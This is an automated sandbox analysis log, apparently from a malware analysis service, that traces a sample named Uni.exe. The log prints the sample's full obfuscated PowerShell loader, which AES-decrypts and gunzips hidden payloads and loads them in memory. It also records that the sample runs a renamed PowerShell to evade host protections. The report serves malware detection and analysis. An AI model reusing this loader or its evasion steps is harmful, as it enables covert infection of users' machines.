'')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Source: C:\Users\user\Desktop\Uni.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "Uni.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));	Jump to behavior

Source: C:\Users\user\Desktop\Uni.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uni.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uni.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uni.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uni.exe	Section loaded: advpack.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Uni.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Uni.exe

Static file information: File size 8581120 > 1048576

Source: Uni.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x820000

Source: Uni.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Uni.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Uni.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Uni.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Uni.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Uni.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Uni.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Uni.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb`@) source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdb source: Uni.exe
Source:	Binary string: System.Management.Automation.pdb source: Uni.bat.exe, 00000005.00000002.1418574944.0000016FDAB53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbW@x source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: Uni.exe
Source:	Binary string: CallSite.Targetore.pdbQGbYDI source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \mscorlib.pdbgQT= source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: Uni.bat.exe, 00000005.00000000.1387345834.00007FF6AC87A000.00000002.00000001.01000000.00000004.sdmp, Uni.bat.exe.2.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: Uni.bat.exe, 00000005.00000002.1418574944.0000016FDAB53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: scorlib.pdbPROCVU source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdbpdb) source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: Uni.bat.exe, 00000005.00000000.1387345834.00007FF6AC87A000.00000002.00000001.01000000.00000004.sdmp, Uni.bat.exe.2.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: Uni.bat.exe, 00000005.00000002.1418302019.0000016FDAAB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: Uni.bat.exe, 00000005.00000002.1418574944.0000016FDAB53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdbt source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp

Source: Uni.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Uni.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Uni.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Uni.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Uni.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: Uni.exe

Static PE information: 0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Code function: 5_2_00007FFAAB7709CA push E95B7ED0h; ret	5_2_00007FFAAB7709C9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Code function: 5_2_00007FFAAB770943 push E95B7ED0h; ret	5_2_00007FFAAB7709C9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Code function: 5_2_00007FFAAB8423E1 push 8B485F95h; iretd	5_2_00007FFAAB8423E6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Code function: 5_2_00007FFAAB84238C push 8B485F95h; iretd	5_2_00007FFAAB842391

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Uni.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\Uni.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\Uni.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\Uni.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\appdata\local\temp\ixp000.tmp\uni.bat.exe

Key value queried: Powershell behavior

Jump to behavior

Renames powershell.exe to bypass HIPS

Source: C:\Windows\System32\cmd.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Memory allocated: 16FC2850000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Memory allocated: 16FDA8C0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Window / User API: threadDelayed 3206			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Window / User API: threadDelayed 1714			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe TID: 7744	Thread sleep count: 3206 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe TID: 7744	Thread sleep count: 1714 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe TID: 7772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi64_7680.amsi.csv, type: OTHER

Source: C:\Windows\System32\cmd.exe

